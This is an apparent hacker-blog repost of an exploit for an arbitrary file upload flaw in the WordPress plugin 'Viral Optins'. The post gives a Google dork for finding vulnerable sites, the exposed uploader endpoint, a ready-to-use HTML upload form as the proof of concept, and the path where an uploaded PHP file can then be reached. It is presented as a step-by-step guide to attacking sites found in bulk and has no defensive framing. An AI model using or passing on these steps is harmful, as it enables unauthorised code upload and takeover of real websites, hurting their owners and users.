Popular Post

Popular Posts

  • >
  • >
  • WordPress Plugins Viral Optins - Arbitrary File Upload

WordPress Plugins Viral Optins - Arbitrary File Upload

Selasa, 13 Juni 2017


# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/

2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php

Indonesian h4x0r.

Navigation

Weekly most viewed

Blogroll

Cari Blog Ini

Arsip Blog

Recent in Sports

Comments

Social

Random Posts

Recent

Header Ads

- Copyright © Social-net7sec - Devil Survivor 2 - Powered by Blogger - Designed by Johanes Djogan -